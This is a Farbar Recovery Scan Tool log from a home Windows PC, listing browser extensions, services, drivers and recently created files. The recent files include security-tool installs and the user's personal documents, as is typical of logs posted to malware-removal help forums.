    CHR Extension: (Google Drive) - C:\Users\Joseph\AppData\Local\Google\Chrome\User Data\Default\Extensions\apdfllckaahabafndbhieahigkjlhalf [2016-09-24]
    CHR Extension: (YouTube) - C:\Users\Joseph\AppData\Local\Google\Chrome\User Data\Default\Extensions\blpcfgokakmgnkcojhhkbfbldkacnbeo [2016-09-22]
    CHR Extension: (Bitdefender Wallet) - C:\Users\Joseph\AppData\Local\Google\Chrome\User Data\Default\Extensions\gannpgaobkkhmpomoijebaigcapoeebl [2017-02-01]
    CHR Extension: (Google Docs Offline) - C:\Users\Joseph\AppData\Local\Google\Chrome\User Data\Default\Extensions\ghbmnnjooekpmoecnnnilnnbdlolhkhi [2016-09-22]
    CHR Extension: (AdBlock) - C:\Users\Joseph\AppData\Local\Google\Chrome\User Data\Default\Extensions\gighmmpiobklfepjocnamgkkbiglidom [2017-01-31]
    CHR Extension: (Chrome Web Store Payments) - C:\Users\Joseph\AppData\Local\Google\Chrome\User Data\Default\Extensions\nmmhkkegccagdldgiimedpiccmgmieda [2017-01-21]
    CHR Extension: (Gmail) - C:\Users\Joseph\AppData\Local\Google\Chrome\User Data\Default\Extensions\pjkljhegncpnkpknbcohdijeoejaedia [2016-09-22]
    CHR Extension: (Chrome Media Router) - C:\Users\Joseph\AppData\Local\Google\Chrome\User Data\Default\Extensions\pkedcjkdefgpdelpbcmbmeomcjbeemfm [2016-12-04]
    CHR HKLM-x32\...\Chrome\Extension: [gannpgaobkkhmpomoijebaigcapoeebl] - hxxps://clients2.google.com/service/update2/crx

    ==================== Services (Whitelisted) ====================

    (If an entry is included in the fixlist, it will be removed from the registry. The file will not be moved unless listed separately.)

    R2 AdobeUpdateService; C:\Program Files (x86)\Common Files\Adobe\Adobe Desktop Common\ElevationManager\AdobeUpdateService.exe [753240 2016-12-09] (Adobe Systems Incorporated)
    R2 AGSService; C:\Program Files (x86)\Common Files\Adobe\AdobeGCClient\AGSService.exe [2227312 2017-01-19] (Adobe Systems, Incorporated)
    R2 ClickToRunSvc; C:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exe [3699904 2016-12-28] (Microsoft Corporation)
    S2 cplspcon; C:\WINDOWS\system32\IntelCpHDCPSvc.exe [431088 2016-09-25] (Intel Corporation)
    S2 dbupdate; C:\Program Files (x86)\Dropbox\Update\DropboxUpdate.exe [143144 2016-11-04] (Dropbox, Inc.)
    S3 dbupdatem; C:\Program Files (x86)\Dropbox\Update\DropboxUpdate.exe [143144 2016-11-04] (Dropbox, Inc.)
    R2 DevMgmtService; C:\Program Files\Bitdefender\Bitdefender Device Management\DevMgmtService.exe [100448 2016-11-29] (Bitdefender)
    R2 esifsvc; C:\WINDOWS\SysWoW64\esif_uf.exe [1419424 2016-09-25] (Intel Corporation)
    R2 GamesAppIntegrationService; C:\Program Files (x86)\WildTangent Games\App\GamesAppIntegrationService.exe [349728 2015-12-22] (WildTangent)
    R2 HP Comm Recover; C:\Program Files\HPCommRecovery\HPCommRecovery.exe [48128 2016-04-18] (HP Inc.) [File not signed]
    R2 HPSupportSolutionsFrameworkService; C:\Program Files (x86)\Hewlett-Packard\HP Support Solutions\HPSupportSolutionsFrameworkService.exe [31776 2016-12-07] (HP Inc.)
    R2 HPWMISVC; c:\Program Files (x86)\HP\HP System Event\HPWMISVC.exe [606224 2016-01-11] (HP Inc.)
    R2 IAStorDataMgrSvc; C:\Program Files\Intel\Intel® Rapid Storage Technology\IAStorDataMgrSvc.exe [19440 2015-11-04] (Intel Corporation)
    R2 igfxCUIService2.0.0.0; C:\WINDOWS\system32\igfxCUIService.exe [356336 2016-09-25] (Intel Corporation)
    S3 Intel® Capability Licensing Service TCP IP Interface; C:\Program Files\Intel\iCLS Client\SocketHeciServer.exe [976848 2016-01-14] (Intel® Corporation)
    S3 Intel® WiDi SAM; C:\Program Files (x86)\Intel Corporation\Intel WiDi\Intel® Software Asset Manager\bin\IntelSoftwareAssetManagerService.exe [19088 2015-09-17] (Intel Corporation)
    R2 jhi_service; C:\Program Files (x86)\Intel\Intel® Management Engine Components\DAL\jhi_service.exe [209184 2016-02-11] (Intel Corporation)
    R2 MBAMService; C:\Program Files\Malwarebytes\Anti-Malware\mbamservice.exe [4355024 2017-01-20] (Malwarebytes)
    S3 MyWiFiDHCPDNS; C:\Program Files\Intel\WiFi\bin\PanDhcpDns.exe [268704 2016-08-04] ()
    R2 ProductAgentService; C:\Program Files\Bitdefender Agent\ProductAgentService.exe [1100392 2016-10-28] (Bitdefender)
    R2 RichVideo64; C:\Program Files\CyberLink\Shared files\RichVideo64.exe [389896 2014-04-14] ()
    R2 RtkAudioService; C:\Program Files\Realtek\Audio\HDA\RtkAudioService64.exe [322560 2017-01-13] (Realtek Semiconductor)
    R2 SynTPEnhService; C:\Program Files\Synaptics\SynTP\SynTPEnhService.exe [266872 2016-08-19] (Synaptics Incorporated)
    R2 UPDATESRV; C:\Program Files\Bitdefender\Bitdefender 2017\updatesrv.exe [218416 2017-01-06] (Bitdefender)
    R2 VSSERV; C:\Program Files\Bitdefender\Bitdefender 2017\vsserv.exe [1526528 2017-02-01] (Bitdefender)
    R2 vsservp; C:\Program Files\Bitdefender\Bitdefender 2017\vsservp.exe [524872 2016-08-25] (Bitdefender)
    S3 WdNisSvc; C:\Program Files\Windows Defender\NisSrv.exe [347328 2016-07-16] (Microsoft Corporation)
    S3 WinDefend; C:\Program Files\Windows Defender\MsMpEng.exe [103720 2016-07-16] (Microsoft Corporation)
    R2 ZeroConfigService; C:\Program Files\Intel\WiFi\bin\ZeroConfigService.exe [3732896 2016-08-04] (Intel® Corporation)

    ===================== Drivers (Whitelisted) ======================

    (If an entry is included in the fixlist, it will be removed from the registry. The file will not be moved unless listed separately.)

    R0 avc3; C:\WINDOWS\System32\DRIVERS\avc3.sys [1605376 2016-09-20] (BitDefender)
    R3 avckf; C:\WINDOWS\System32\DRIVERS\avckf.sys [878072 2016-09-20] (BitDefender)
    S0 bdelam; C:\WINDOWS\System32\drivers\bdelam.sys [23672 2016-03-14] (Bitdefender)
    R1 bdfwfpf; C:\Program Files\Common Files\Bitdefender\Bitdefender Firewall\bdfwfpf.sys [128400 2016-06-24] (BitDefender LLC)
    R1 BDVEDISK; C:\WINDOWS\system32\DRIVERS\bdvedisk.sys [87912 2015-12-04] (BitDefender)
    R3 dptf_cpu; C:\WINDOWS\System32\drivers\dptf_cpu.sys [52208 2016-09-25] (Intel Corporation)
    R3 esif_lf; C:\WINDOWS\system32\DRIVERS\esif_lf.sys [260080 2016-09-25] (Intel Corporation)
    R1 ESProtectionDriver; C:\WINDOWS\system32\drivers\mbae64.sys [77416 2017-01-20] ()
    R0 gzflt; C:\WINDOWS\System32\DRIVERS\gzflt.sys [182944 2016-10-29] (BitDefender LLC)
    R3 ibtusb; C:\WINDOWS\system32\DRIVERS\ibtusb.sys [345872 2016-05-26] (Intel Corporation)
    R0 ignis; C:\WINDOWS\system32\DRIVERS\ignis.sys [309280 2016-11-17] (Bitdefender)
    R2 MBAMChameleon; C:\WINDOWS\system32\drivers\MBAMChameleon.sys [176064 2017-02-01] (Malwarebytes)
    R3 MBAMFarflt; C:\WINDOWS\system32\drivers\farflt.sys [110536 2017-02-01] (Malwarebytes)
    R3 MBAMProtection; C:\WINDOWS\system32\drivers\mbam.sys [43968 2017-02-01] (Malwarebytes)
    R3 MBAMSwissArmy; C:\WINDOWS\system32\drivers\MBAMSwissArmy.sys [251848 2017-02-01] (Malwarebytes)
    S3 MBAMWebAccessControl; C:\windows\system32\drivers\mwac.sys [91584 2017-02-01] (Malwarebytes)
    R3 MBAMWebProtection; C:\WINDOWS\system32\drivers\mwac.sys [91584 2017-02-01] (Malwarebytes)
    S3 NetAdapterCx; C:\WINDOWS\System32\drivers\NetAdapterCx.sys [90624 2016-07-16] ()
    U5 Netwtw02; C:\Windows\System32\Drivers\Netwtw02.sys [6724368 2016-02-06] (Intel Corporation)
    R3 Netwtw04; C:\WINDOWS\System32\drivers\Netwtw04.sys [7308560 2016-09-13] (Intel Corporation)
    R3 rt640x64; C:\WINDOWS\System32\drivers\rt640x64.sys [935168 2016-01-19] (Realtek                                            )
    S3 RTSPER; C:\WINDOWS\system32\DRIVERS\RtsPer.sys [769752 2016-01-20] (Realsil Semiconductor Corporation)
    S3 RTSUER; C:\WINDOWS\system32\Drivers\RtsUer.sys [413912 2016-01-20] (Realsil Semiconductor Corporation)
    S3 SmbDrv; C:\WINDOWS\System32\drivers\Smb_driver_AMDASF.sys [58984 2016-02-22] (Synaptics Incorporated)
    R3 SmbDrvI; C:\WINDOWS\system32\DRIVERS\Smb_driver_Intel.sys [72824 2016-08-19] (Synaptics Incorporated)
    R0 trufos; C:\WINDOWS\System32\DRIVERS\trufos.sys [520032 2016-06-22] (BitDefender S.R.L.)
    S3 WdBoot; C:\WINDOWS\system32\drivers\WdBoot.sys [44056 2016-07-16] (Microsoft Corporation)
    S3 WdFilter; C:\WINDOWS\system32\drivers\WdFilter.sys [290144 2016-07-16] (Microsoft Corporation)
    S3 WdNisDrv; C:\WINDOWS\System32\Drivers\WdNisDrv.sys [123232 2016-07-16] (Microsoft Corporation)
    R3 WirelessButtonDriver64; C:\WINDOWS\system32\DRIVERS\WirelessButtonDriver64.sys [31656 2016-04-14] (HP)
    U0 aswVmm; no ImagePath

    ==================== NetSvcs (Whitelisted) ===================

    (If an entry is included in the fixlist, it will be removed from the registry. The file will not be moved unless listed separately.)


    ==================== One Month Created files and folders ========

    (If an entry is included in the fixlist, the file/folder will be moved.)

    2017-02-01 21:13 - 2017-02-01 21:16 - 00002795 _____ C:\Users\Joseph\Downloads\Fixlog.txt
    2017-02-01 21:11 - 2017-02-01 21:13 - 00000000 ____D C:\Users\Joseph\Documents\FRST911
    2017-02-01 20:30 - 2017-02-01 21:28 - 00000000 ____D C:\Users\Joseph\AppData\LocalLow\Mozilla
    2017-02-01 20:29 - 2017-02-01 20:36 - 00000000 ____D C:\Users\Joseph\AppData\Local\Mozilla
    2017-02-01 20:29 - 2017-02-01 20:30 - 00000000 ____D C:\Users\Joseph\AppData\Roaming\Mozilla
    2017-02-01 20:28 - 2017-02-01 20:28 - 00001239 _____ C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Mozilla Firefox.lnk
    2017-02-01 20:28 - 2017-02-01 20:28 - 00001227 _____ C:\Users\Public\Desktop\Mozilla Firefox.lnk
    2017-02-01 20:28 - 2017-02-01 20:28 - 00000000 ____D C:\Program Files (x86)\Mozilla Maintenance Service
    2017-02-01 20:28 - 2017-02-01 20:28 - 00000000 ____D C:\Program Files (x86)\Mozilla Firefox
    2017-02-01 20:26 - 2017-02-01 20:27 - 00245424 _____ C:\Users\Joseph\Downloads\Firefox Setup Stub 51.0.1.exe
    2017-02-01 18:24 - 2017-02-01 18:25 - 55566792 _____ (Malwarebytes ) C:\Users\Joseph\Downloads\mb3-setup-cb.NT-3.0.6.1469.exe
    2017-02-01 17:47 - 2017-02-01 21:09 - 00041949 _____ C:\Users\Joseph\Downloads\Addition.txt
    2017-02-01 17:45 - 2017-02-01 21:30 - 00024848 _____ C:\Users\Joseph\Downloads\FRST.txt
    2017-02-01 17:45 - 2017-02-01 21:30 - 00000000 ____D C:\FRST
    2017-02-01 17:43 - 2017-02-01 17:45 - 02420736 _____ (Farbar) C:\Users\Joseph\Downloads\FRST64.exe
    2017-02-01 17:20 - 2017-02-01 17:27 - 00000556 _____ C:\Users\Joseph\Desktop\JRT.txt
    2017-02-01 17:07 - 2017-02-01 21:17 - 00002361 _____ C:\bdlog.txt
    2017-02-01 17:02 - 2017-02-01 18:10 - 00000000 ____D C:\AdwCleaner
    2017-02-01 16:58 - 2017-02-01 17:15 - 01663040 _____ (Malwarebytes) C:\Users\Joseph\Downloads\JRT (1).exe
    2017-02-01 16:56 - 2017-02-01 16:58 - 01663040 _____ (Malwarebytes) C:\Users\Joseph\Downloads\JRT.exe
    2017-02-01 16:54 - 2017-02-01 17:01 - 03988944 _____ C:\Users\Joseph\Downloads\AdwCleaner.exe
    2017-02-01 16:52 - 2017-02-01 16:52 - 00040137 _____ C:\ProgramData\dm.1485985887.bdinstall.bin
    2017-02-01 09:33 - 2017-02-01 09:33 - 00000385 _____ C:\WINDOWS\system32\user_gensett.xml
    2017-02-01 08:54 - 2017-02-01 08:54 - 00000000 ____D C:\Users\Joseph\AppData\Temp
    2017-02-01 08:52 - 2017-02-01 08:52 - 00056949 _____ C:\ProgramData\dm.1485956857.bdinstall.bin
    2017-02-01 08:51 - 2017-02-01 08:51 - 00000000 ____D C:\ProgramData\Bitdefender Device Management
    2017-02-01 08:47 - 2017-02-01 18:34 - 00003406 _____ C:\WINDOWS\System32\Tasks\Bitdefender AgentTask_AD394AE64E874073B10A89FEEC305A3C
    2017-02-01 08:47 - 2017-02-01 08:47 - 00403991 _____ C:\ProgramData\cl.1485956260.bdinstall.bin
    2017-02-01 08:45 - 2017-02-01 08:45 - 00002310 _____ C:\Users\Public\Desktop\Bitdefender 2017.lnk
    2017-02-01 08:45 - 2017-02-01 08:45 - 00000000 ____D C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Bitdefender 2017
    2017-02-01 08:45 - 2017-02-01 08:45 - 00000000 ____D C:\ProgramData\BDLogging
    2017-02-01 08:44 - 2016-09-20 04:17 - 01605376 _____ (BitDefender) C:\WINDOWS\system32\Drivers\avc3.sys
    2017-02-01 08:44 - 2016-09-20 04:16 - 00878072 _____ (BitDefender) C:\WINDOWS\system32\Drivers\avckf.sys
    2017-02-01 08:44 - 2016-03-14 22:04 - 00023672 _____ (Bitdefender) C:\WINDOWS\system32\Drivers\bdelam.sys
    2017-02-01 08:44 - 2015-12-04 19:27 - 00087912 _____ (BitDefender) C:\WINDOWS\system32\Drivers\bdvedisk.sys
    2017-02-01 08:44 - 2007-04-11 11:11 - 00511328 _____ (Microsoft Corporation) C:\WINDOWS\capicom.dll
    2017-02-01 08:43 - 2017-02-01 08:51 - 00000000 ____D C:\Users\Joseph\AppData\Roaming\Bitdefender
    2017-02-01 08:43 - 2016-11-17 05:00 - 00309280 _____ (Bitdefender) C:\WINDOWS\system32\Drivers\ignis.sys
    2017-02-01 08:38 - 2017-02-01 18:34 - 00000000 ____D C:\ProgramData\Bitdefender
    2017-02-01 08:38 - 2017-02-01 08:47 - 00000000 ____D C:\Program Files\Bitdefender
    2017-02-01 08:38 - 2016-10-29 08:54 - 00182944 _____ (BitDefender LLC) C:\WINDOWS\system32\Drivers\gzflt.sys
    2017-02-01 08:38 - 2016-06-22 14:40 - 00520032 _____ (BitDefender S.R.L.) C:\WINDOWS\system32\Drivers\trufos.sys
    2017-02-01 08:37 - 2017-02-01 08:38 - 00000000 ____D C:\Program Files\Common Files\Bitdefender
    2017-02-01 08:37 - 2017-02-01 08:37 - 00000000 ____D C:\Users\Joseph\AppData\Roaming\QuickScan
    2017-02-01 08:29 - 2017-02-01 08:29 - 00003794 _____ C:\WINDOWS\System32\Tasks\Bitdefender Agent WatchDog_65D6944A0EF74FDAB96E31112AD39864
    2017-02-01 08:27 - 2017-02-01 21:29 - 00000000 ____D C:\Program Files\Bitdefender Agent
    2017-02-01 08:27 - 2017-02-01 08:27 - 00047353 _____ C:\ProgramData\agent.1485955633.bdinstall.bin
    2017-02-01 08:27 - 2017-02-01 08:27 - 00000000 ____D C:\ProgramData\Bitdefender Agent
    2017-02-01 08:26 - 2017-02-01 08:27 - 11842648 _____ C:\Users\Joseph\Downloads\bitdefender_windows_43ea11d5-575e-4d5e-84a9-5683192df898.exe
    2017-01-31 23:27 - 2017-01-31 23:27 - 00000017 _____ C:\Users\Joseph\AppData\Local\resmon.resmoncfg
    2017-01-31 23:13 - 2017-01-31 23:13 - 00251848 _____ (Malwarebytes) C:\WINDOWS\system32\Drivers\132034FB.sys
    2017-01-31 15:37 - 2017-01-31 15:37 - 01923396 _____ C:\Users\Joseph\Downloads\hospital visit.pdf
    2017-01-30 20:58 - 2017-01-30 20:59 - 02059056 _____ (The Nielsen Company) C:\Users\Joseph\Downloads\ShopTracker_033D6D4A68A315B4A000 (2).exe
    2017-01-28 01:57 - 2017-01-28 01:57 - 00000000 ____D C:\WINDOWS\System32\Tasks\AVAST Software
    2017-01-28 01:57 - 2017-01-28 01:57 - 00000000 ____D C:\Program Files\Common Files\AV
    2017-01-25 00:02 - 2016-12-21 02:08 - 00142848 _____ (Microsoft Corporation) C:\WINDOWS\system32\poqexec.exe
    2017-01-25 00:02 - 2016-12-20 23:44 - 00120320 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\poqexec.exe
    2017-01-24 23:47 - 2017-01-21 21:14 - 00485032 ____N (Microsoft Corporation) C:\WINDOWS\system32\MpSigStub.exe
    2017-01-24 17:47 - 2017-01-24 17:47 - 10697014 _____ C:\Users\Joseph\Downloads\FDN_Glyphosate_FoodTesting_Report_p2016.pdf
    2017-01-24 13:33 - 2017-01-24 13:33 - 00083650 _____ C:\Users\Joseph\Downloads\visit 1-23.pdf
    2017-01-21 13:55 - 2017-02-01 08:34 - 00000000 ____D C:\ProgramData\AVAST Software
    2017-01-21 13:55 - 2017-01-21 13:55 - 06253640 _____ (AVAST Software) C:\Users\Joseph\Downloads\avast_free_antivirus_setup_online_cnet_2.exe
    2017-01-19 21:09 - 2017-01-19 21:09 - 00151143 _____ C:\Users\Joseph\Downloads\PDF_Bill (2).pdf
    2017-01-19 21:09 - 2017-01-19 21:09 - 00150985 _____ C:\Users\Joseph\Downloads\PDF_Bill (3).pdf
    2017-01-19 21:08 - 2017-01-19 21:08 - 00199440 _____ C:\Users\Joseph\Downloads\PDF_Bill (1).pdf
    2017-01-19 21:06 - 2017-01-19 21:06 - 00001115 _____ C:\Users\Joseph\Downloads\AccountEnergyUsage.csv
    2017-01-19 20:26 - 2017-01-19 20:26 - 00223944 _____ C:\Users\Joseph\Downloads\djcxMjYtODA5MC04MDkxLTgzNjMtT0lCMS00MDRGQUFCQi0wLTIyMzk0NC00Nzk2ODE3LTIyMzk0NC04NS02OC0wLTE2OS0wLV4BUAExNzA5NgEyMzYxNAE0AUNCQwFDQkMwMQEyMDA0LTAwMDEBQUNDRVNTIE5BVElPTkFMIENPUlBPUkFUSU9OIFBST0ZJVCBTSEFSSU5HIFBMQU4BTkEBUk.pdf
    2017-01-19 14:36 - 2017-01-19 14:36 - 00000000 ____D C:\Users\Joseph\AppData\LocalLow\Temp
    2017-01-18 22:07 - 2017-01-18 22:07 - 00676419 _____ C:\Users\Joseph\Downloads\137230-201711873115438.pdf
    2017-01-15 18:00 - 2017-01-15 18:00 - 00151143 _____ C:\Users\Joseph\Downloads\PDF_Bill.pdf
    2017-01-15 16:33 - 2017-01-15 16:33 - 00086004 _____ C:\Users\Joseph\Downloads\DS82_Complete (1).pdf
    2017-01-15 16:15 - 2017-01-15 16:15 - 00683112 _____ C:\Users\Joseph\Downloads\taxReturn (1).tax2016
    2017-01-15 16:11 - 2017-01-15 16:24 - 01487502 _____ C:\Users\Joseph\Downloads\taxReturn.tax2016
    2017-01-15 15:50 - 2017-01-15 15:50 - 06281998 _____ C:\Users\Joseph\Downloads\C2 Artist Mini-Posters.pdf
    2017-01-15 15:44 - 2017-01-15 15:44 - 00002529 _____ C:\Users\Public\Desktop\TurboTax 2016.lnk
    2017-01-15 15:44 - 2017-01-15 15:44 - 00000000 ____D C:\ProgramData\Microsoft\Windows\Start Menu\Programs\TurboTax 2016
    2017-01-15 15:29 - 2017-01-15 15:30 - 121060464 _____ C:\Users\Joseph\Downloads\turbotax_deluxe_2016_windows.exe
    2017-01-14 21:56 - 2017-01-14 21:56 - 00085948 _____ C:\Users\Joseph\Downloads\DS82_Complete.pdf
    2017-01-14 11:22 - 2017-01-14 11:22 - 00235450 _____ C:\Users\Joseph\Downloads\CAMP_CONNECTION_CARNIVAL_flier2106.pdf
    2017-01-13 15:55 - 2017-01-13 15:53 - 72520712 _____ (Realtek Semiconductor Corp.) C:\WINDOWS\system32\RCoRes64.dat
    2017-01-13 15:55 - 2017-01-13 15:53 - 07704619 _____ C:\WINDOWS\system32\Drivers\RTAIODAT.DAT
    2017-01-13 15:55 - 2017-01-13 15:53 - 03204096 _____ (Realtek Semiconductor Corp.) C:\WINDOWS\system32\RtPgEx64.dll
    2017-01-13 15:55 - 2017-01-13 15:53 - 03014144 _____ (Realtek Semiconductor Corp.) C:\WINDOWS\system32\RTSnMg64.cpl
    2017-01-13 15:55 - 2017-01-13 15:53 - 02706856 _____ (DTS, Inc.) C:\WINDOWS\system32\sltech64.dll
    2017-01-13 15:55 - 2017-01-13 15:53 - 02201088 _____ (Realtek Semiconductor Corp.) C:\WINDOWS\system32\RCoInstII64.dll
    2017-01-13 15:55 - 2017-01-13 15:53 - 01615656 _____ (Conexant Systems Inc.) C:\WINDOWS\system32\CX64APO.dll
    2017-01-13 15:55 - 2017-01-13 15:53 - 01529136 _____ (Conexant Systems Inc.) C:\WINDOWS\system32\CX64Proxy.dll
    2017-01-13 15:55 - 2017-01-13 15:53 - 01435136 _____ (Synopsys, Inc.) C:\WINDOWS\system32\SRRPTR64.dll
    2017-01-13 15:55 - 2017-01-13 15:53 - 01360512 _____ (Realtek Semiconductor Corp.) C:\WINDOWS\system32\RTCOM64.dll
    2017-01-13 15:55 - 2017-01-13 15:53 - 01003320 _____ (Sound Research, Corp.) C:\WINDOWS\system32\SEHDHF64.dll
    2017-01-13 15:55 - 2017-01-13 15:53 - 00984912 _____ (DTS, Inc.) C:\WINDOWS\system32\sl3apo64.dll
    2017-01-13 15:55 - 2017-01-13 15:53 - 00865912 _____ (Sound Research, Corp.) C:\WINDOWS\SysWOW64\SEHDHF32.dll
    2017-01-13 15:55 - 2017-01-13 15:53 - 00859216 _____ (Sound Research, Corp.) C:\WINDOWS\system32\SEHDRA64.dll
    2017-01-13 15:55 - 2017-01-13 15:53 - 00850400 _____ (Sound Research, Corp.) C:\WINDOWS\system32\SECOMN64.dll
    2017-01-13 15:55 - 2017-01-13 15:53 - 00721800 _____ (Sound Research, Corp.) C:\WINDOWS\SysWOW64\SECOMN32.dll
    2017-01-13 15:55 - 2017-01-13 15:53 - 00689872 _____ (Realtek Semiconductor Corp.) C:\WINDOWS\system32\RtDataProc64.dll
    2017-01-13 15:55 - 2017-01-13 15:53 - 00574752 _____ (Andrea Electronics Corporation) C:\WINDOWS\system32\AERTAC64.dll
    2017-01-13 15:55 - 2017-01-13 15:53 - 00532376 _____ (SRS Labs, Inc.) C:\WINDOWS\system32\SRSTSX64.dll
    2017-01-13 15:55 - 2017-01-13 15:53 - 00499152 _____ (Sound Research, Corp.) C:\WINDOWS\system32\SEAPO64.dll
    2017-01-13 15:55 - 2017-01-13 15:53 - 00467152 _____ (Synopsys, Inc.) C:\WINDOWS\system32\SRAPO64.dll
    2017-01-13 15:55 - 2017-01-13 15:53 - 00438688 _____ (Conexant Systems, Inc.) C:\WINDOWS\system32\CAF64APO2.dll
    2017-01-13 15:55 - 2017-01-13 15:53 - 00387312 _____ (Dolby Laboratories, Inc.) C:\WINDOWS\system32\RTEEP64A.dll
    2017-01-13 15:55 - 2017-01-13 15:53 - 00381400 _____ (Synopsys, Inc.) C:\WINDOWS\system32\SRCOM64.dll
    2017-01-13 15:55 - 2017-01-13 15:53 - 00343704 _____ (Realtek Semiconductor Corp.) C:\WINDOWS\system32\RtlCPAPI64.dll
    2017-01-13 15:55 - 2017-01-13 15:53 - 00341144 _____ (Synopsys, Inc.) C:\WINDOWS\SysWOW64\SRCOM.dll
    2017-01-13 15:55 - 2017-01-13 15:53 - 00341144 _____ (Synopsys, Inc.) C:\WINDOWS\system32\SRCOM.dll
    2017-01-13 15:55 - 2017-01-13 15:53 - 00321712 _____ (Dolby Laboratories, Inc.) C:\WINDOWS\system32\RP3DHT64.dll
    2017-01-13 15:55 - 2017-01-13 15:53 - 00321712 _____ (Dolby Laboratories, Inc.) C:\WINDOWS\system32\RP3DAA64.dll
    2017-01-13 15:55 - 2017-01-13 15:53 - 00258864 _____ (TODO: <Company name>) C:\WINDOWS\system32\slprp64.dll
    2017-01-13 15:55 - 2017-01-13 15:53 - 00214832 _____ (Dolby Laboratories, Inc.) C:\WINDOWS\system32\RTEED64A.dll
    2017-01-13 15:55 - 2017-01-13 15:53 - 00166200 _____ (SRS Labs, Inc.) C:\WINDOWS\system32\SRSWOW64.dll
    2017-01-13 15:55 - 2017-01-13 15:53 - 00122320 _____ (Real Sound Lab SIA) C:\WINDOWS\system32\CONEQMSAPOGUILibrary.dll
    2017-01-13 15:55 - 2017-01-13 15:53 - 00118592 _____ (Andrea Electronics Corporation) C:\WINDOWS\system32\AERTAR64.dll
    2017-01-13 15:55 - 2017-01-13 15:53 - 00112488 _____ (Conexant Systems, Inc.) C:\WINDOWS\system32\Caf64api.dll
    2017-01-13 15:55 - 2017-01-13 15:53 - 00110984 _____ (Dolby Laboratories, Inc.) C:\WINDOWS\system32\RTEEL64A.dll
    2017-01-13 15:55 - 2017-01-13 15:53 - 00088344 _____ (Dolby Laboratories, Inc.) C:\WINDOWS\system32\RTEEG64A.dll
    2017-01-13 15:55 - 2017-01-13 15:53 - 00005604 _____ C:\WINDOWS\system32\cxapo.lncs
    2017-01-13 15:55 - 2017-01-13 15:53 - 00000736 _____ C:\WINDOWS\system32\cxapo.prop
    2017-01-11 23:08 - 2017-01-11 23:08 - 02604526 _____ C:\Users\Joseph\Downloads\AAS-L2-Student-Packet-Sample.pdf
    2017-01-11 22:56 - 2017-01-11 22:56 - 02399782 _____ C:\Users\Joseph\Downloads\AAS-L1-Student-Packet-Sample.pdf
    2017-01-11 22:55 - 2017-01-11 22:55 - 05323693 _____ C:\Users\Joseph\Downloads\AAR-L1-2ndEd-CobwebtheCat-Sample.pdf
    2017-01-11 15:10 - 2017-01-11 15:10 - 05432492 _____ C:\Users\Joseph\Downloads\01-08-2017.pdf
    2017-01-11 15:07 - 2017-01-11 15:07 - 00106459 _____ C:\Users\Joseph\Downloads\bill_10912246.pdf
    2017-01-10 22:58 - 2016-12-21 00:09 - 00263472 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\Windows.Storage.ApplicationData.dll
    2017-01-10 22:58 - 2016-12-21 00:01 - 20969928 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\shell32.dll
    2017-01-10 22:58 - 2016-12-20 23:46 - 00034304 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\LaunchWinApp.exe
    2017-01-10 22:58 - 2016-12-20 23:43 - 00285184 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\Windows.UI.BlockedShutdown.dll
    2017-01-10 22:58 - 2016-12-20 23:41 - 00253952 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\Windows.UI.BioFeedback.dll
    2017-01-10 22:58 - 2016-12-20 23:40 - 00557568 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\StoreAgent.dll
    2017-01-10 22:58 - 2016-12-20 23:40 - 00318976 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\rdpencom.dll
    2017-01-10 22:58 - 2016-12-20 23:40 - 00237056 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\SyncSettings.dll
    2017-01-10 22:58 - 2016-12-20 23:40 - 00180224 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\InstallAgent.exe
    2017-01-10 22:58 - 2016-12-20 23:39 - 00223232 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\InstallAgentUserBroker.exe
    2017-01-10 22:58 - 2016-12-20 23:38 - 00866816 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\Windows.UI.Cred.dll
    2017-01-10 22:58 - 2016-12-20 23:34 - 07626752 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\twinui.dll
    2017-01-10 22:58 - 2016-12-20 23:30 - 05398016 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\aclui.dll
    2017-01-10 22:58 - 2016-12-20 23:30 - 01255936 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\AzureSettingSyncProvider.dll
    2017-01-10 22:58 - 2016-12-20 23:25 - 07469056 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\mstscax.dll
    2017-01-10 22:58 - 2016-12-20 23:22 - 01883648 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\Windows.UI.Logon.dll
    2017-01-10 22:58 - 2016-12-20 23:22 - 00860672 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\SettingSyncCore.dll
    2017-01-10 22:58 - 2016-12-14 00:08 - 00341344 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\msv1_0.dll
    2017-01-10 22:58 - 2016-12-14 00:06 - 00509792 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\SettingSyncHost.exe
    2017-01-10 22:58 - 2016-12-14 00:01 - 01557808 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\winmde.dll
    2017-01-10 22:58 - 2016-12-13 23:45 - 00147968 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\win32k.sys
    2017-01-10 22:58 - 2016-12-13 23:42 - 00167424 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\WinSCard.dll
    2017-01-10 22:58 - 2016-12-13 23:36 - 00074752 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\updatepolicy.dll
    2017-01-10 22:58 - 2016-12-13 23:35 - 00712192 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\wuapi.dll
    2017-01-10 22:58 - 2016-12-13 23:35 - 00553984 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\cryptui.dll
